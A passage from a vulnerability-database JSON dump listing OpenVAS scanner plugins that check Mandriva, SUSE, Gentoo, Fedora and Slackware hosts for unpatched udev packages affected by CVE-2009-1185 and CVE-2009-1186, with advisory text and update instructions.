(CVE-2009-1185).\n\nThe updated packages have been patched to prevent this.\n\nAffected: Corporate 4.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:104\";\ntag_summary = \"The remote host is missing an update to udev\nannounced via advisory MDVSA-2009:104.\";\n\n \n\nif(description)\n{\n script_id(63917);\n script_version(\"$Revision: 6587 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 08:35:35 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 16:00:35 +0200 (Tue, 05 May 2009)\");\n script_cve_id(\"CVE-2009-1185\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:104 (udev)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"udev\", rpm:\"udev~068~34.1.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev-doc\", rpm:\"udev-doc~068~34.1.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev-tools\", rpm:\"udev-tools~068~34.1.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:55:18", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n udev\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/", "cvss3": {}, "published": "2009-10-13T00:00:00", "type": "openvas", "title": "SLES10: Security update for udev", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185"], "modified": "2017-07-11T00:00:00", "id": "OPENVAS:65831", "href": "http://plugins.openvas.org/nasl.php?oid=65831", "sourceData": "#\n#VID slesp2-udev-6153\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for udev\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n udev\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_id(65831);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2009-1185\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES10: Security update for udev\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"udev\", rpm:\"udev~085~30.52\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:58", "description": "The remote host is missing updates announced in\nadvisory GLSA 200904-18.", "cvss3": {}, "published": "2009-04-20T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200904-18 (udev)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185", "CVE-2009-1186"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231063854", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063854", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Two errors in udev allow for a local root compromise and a Denial of\n Service.\";\ntag_solution = \"All udev users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=sys-fs/udev-124-r2'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200904-18\nhttp://bugs.gentoo.org/show_bug.cgi?id=266290\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200904-18.\";\n\n \n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63854\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-20 23:45:17 +0200 (Mon, 20 Apr 2009)\");\n script_cve_id(\"CVE-2009-1185\", \"CVE-2009-1186\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200904-18 (udev)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"sys-fs/udev\", unaffected: make_list(\"ge 124-r2\"), vulnerable: make_list(\"lt 124-r2\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:37:31", "description": "The remote host is missing an update to udev\nannounced via advisory FEDORA-2009-3712.", "cvss3": {}, "published": "2009-04-20T00:00:00", "type": "openvas", "title": "Fedora Core 9 FEDORA-2009-3712 (udev)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185", "CVE-2009-1186"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231063837", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063837", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_3712.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-3712 (udev)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The udev package contains an implementation of devfs in\nuserspace using sysfs and netlink.\n\nUpdate Information:\n\nudev provides a user-space API and implements a dynamic device directory,\nproviding only the devices present on the system. udev replaces devfs in order\nto provide greater hot plug functionality. Netlink is a datagram oriented\nservice, used to transfer information between kernel modules and user-space\nprocesses.\n\nIt was discovered that udev did not properly check the origin of\nNetlink messages. A local attacker could use this flaw to gain root privileges\nvia a crafted Netlink message sent to udev, causing it to create a world-\nwritable block device file for an existing system block device (for example, the\nroot file system). (CVE-2009-1185)\n\nAn integer overflow flaw, potentially\nleading to heap-based buffer overflow was found in one of the utilities\nproviding functionality of the udev device information interface. An attacker\ncould use this flaw to cause a denial of service, or possibly, to execute\narbitrary code by providing a specially-crafted arguments as input to this\nutility. (CVE-2009-1186)\n\nThanks to Sebastian Krahmer of the SUSE Security Team for responsibly\nreporting this flaw.\n\nUsers of udev are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the udevd daemon will be restarted automatically.\n\nChangeLog:\n\n* Thu Apr 16 2009 Harald Hoyer 124-4\n- fix for CVE-2009-1186\n* Tue Apr 14 2009 Harald Hoyer 124-3\n- fix for CVE-2009-1185\n* Wed Aug 6 2008 Harald Hoyer 124-2\n- added patch for cdrom tray close bug (rhbz#453095)\n- fixed udevadm syntax in start_udev (credits B.J.W. Polman)\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update udev' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-3712\";\ntag_summary = \"The remote host is missing an update to udev\nannounced via advisory FEDORA-2009-3712.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63837\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-20 23:45:17 +0200 (Mon, 20 Apr 2009)\");\n script_cve_id(\"CVE-2009-1185\", \"CVE-2009-1186\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 9 FEDORA-2009-3712 (udev)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=495051\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=495052\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libvolume_id\", rpm:\"libvolume_id~124~4.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id-devel\", rpm:\"libvolume_id-devel~124~4.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev\", rpm:\"udev~124~4.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev-static\", rpm:\"udev-static~124~4.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev-debuginfo\", rpm:\"udev-debuginfo~124~4.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:19", "description": "The remote host is missing updates announced in\nadvisory SUSE-SA:2009:020.", "cvss3": {}, "published": "2009-04-20T00:00:00", "type": "openvas", "title": "SuSE Security Advisory SUSE-SA:2009:020 (udev)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185", "CVE-2009-1186"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231063845", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063845", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: suse_sa_2009_020.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory SUSE-SA:2009:020 (udev)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Sebastian Krahmer of SUSE Security identified a problem in udevd with\nhandling of netlink messages.\n\nLocal attackers could inject netlink messages due to a missing origin\ncheck where only the kernel should have been able to and so are able\nto escalate privileges. (CVE-2009-1185)\n\nFixed packages have been released to address this issue for openSUSE\n10.3-11.1, SUSE Linux Enterprise 10 SP2 and SUSE Linux Enterprise 11.\n\nSUSE Linux Enterprise Server 9 and Novell Linux Desktop 9 are not\naffected by this problem.\";\ntag_solution = \"Update your system with the packages as indicated in\nthe referenced security advisory.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=SUSE-SA:2009:020\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory SUSE-SA:2009:020.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63845\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-20 23:45:17 +0200 (Mon, 20 Apr 2009)\");\n script_cve_id(\"CVE-2009-1185\", \"CVE-2009-1186\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SuSE Security Advisory SUSE-SA:2009:020 (udev)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libudev-devel\", rpm:\"libudev-devel~128~9.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libudev0\", rpm:\"libudev0~128~9.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id\", rpm:\"libvolume_id~126~17.38.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id-devel\", rpm:\"libvolume_id-devel~128~9.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id1\", rpm:\"libvolume_id1~128~9.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev\", rpm:\"udev~128~9.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id\", rpm:\"libvolume_id~120~13.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id-devel\", rpm:\"libvolume_id-devel~120~13.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev\", rpm:\"udev~120~13.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id\", rpm:\"libvolume_id~114~19.3\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id-devel\", rpm:\"libvolume_id-devel~114~19.3\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev\", rpm:\"udev~114~19.3\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:22", "description": "The remote host is missing an update to udev\nannounced via advisory FEDORA-2009-3711.", "cvss3": {}, "published": "2009-04-20T00:00:00", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-3711 (udev)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185", "CVE-2009-1186"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231063838", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063838", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_3711.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-3711 (udev)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The udev package contains an implementation of devfs in\nuserspace using sysfs and netlink.\n\nUpdate Information:\n\nudev provides a user-space API and implements a dynamic device directory,\nproviding only the devices present on the system. udev replaces devfs in order\nto provide greater hot plug functionality. Netlink is a datagram oriented\nservice, used to transfer information between kernel modules and user-space\nprocesses.\n\nIt was discovered that udev did not properly check the origin of\nNetlink messages. A local attacker could use this flaw to gain root privileges\nvia a crafted Netlink message sent to udev, causing it to create a world-\nwritable block device file for an existing system block device (for example, the\nroot file system). (CVE-2009-1185)\n\nAn integer overflow flaw, potentially\nleading to heap-based buffer overflow was found in one of the utilities\nproviding functionality of the udev device information interface. An attacker\ncould use this flaw to cause a denial of service, or possibly, to execute\narbitrary code by providing a specially-crafted arguments as input to this\nutility. (CVE-2009-1186)\n\nThanks to Sebastian Krahmer of the SUSE Security Team for responsibly\nreporting this flaw. Users of udev are advised to upgrade to these\nupdated packages, which contain a backported patch to correct this issue.\nAfter installing the update, the udevd daemon will be restarted automatically.\n\nChangeLog:\n\n* Thu Apr 16 2009 Harald Hoyer 127-5\n- fix for CVE-2009-1186\n* Wed Apr 15 2009 Harald Hoyer 127-4\n- fix for CVE-2009-1185\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update udev' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-3711\";\ntag_summary = \"The remote host is missing an update to udev\nannounced via advisory FEDORA-2009-3711.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63838\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-20 23:45:17 +0200 (Mon, 20 Apr 2009)\");\n script_cve_id(\"CVE-2009-1185\", \"CVE-2009-1186\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-3711 (udev)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=495051\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=495052\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libudev-devel\", rpm:\"libudev-devel~127~5.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libudev0\", rpm:\"libudev0~127~5.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id\", rpm:\"libvolume_id~127~5.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id-devel\", rpm:\"libvolume_id-devel~127~5.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev\", rpm:\"udev~127~5.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev-static\", rpm:\"udev-static~127~5.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev-debuginfo\", rpm:\"udev-debuginfo~127~5.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:49", "description": "The remote host is missing an update as announced\nvia advisory SSA:2009-111-01.", "cvss3": {}, "published": "2012-09-11T00:00:00", "type": "openvas", "title": "Slackware Advisory SSA:2009-111-01 udev", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185", "CVE-2009-1186"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:136141256231063895", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063895", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2009_111_01.nasl 14202 2019-03-15 09:16:15Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63895\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 10:16:15 +0100 (Fri, 15 Mar 2019) $\");\n script_cve_id(\"CVE-2009-1185\", \"CVE-2009-1186\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 14202 $\");\n script_name(\"Slackware Advisory SSA:2009-111-01 udev\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\", re:\"ssh/login/release=SLK(10\\.2|11\\.0|12\\.0|12\\.1|12\\.2)\");\n\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2009-111-01\");\n\n script_tag(name:\"insight\", value:\"New udev packages are available for Slackware 10.2, 11.0, 12.0, 12.1, 12.2,\nand -current to fix security issues.\n\nThe udev packages in Slackware 10.2, 11.0, 12.0, 12.1, 12.2, and -current\ncontained a local root hole vulnerability: 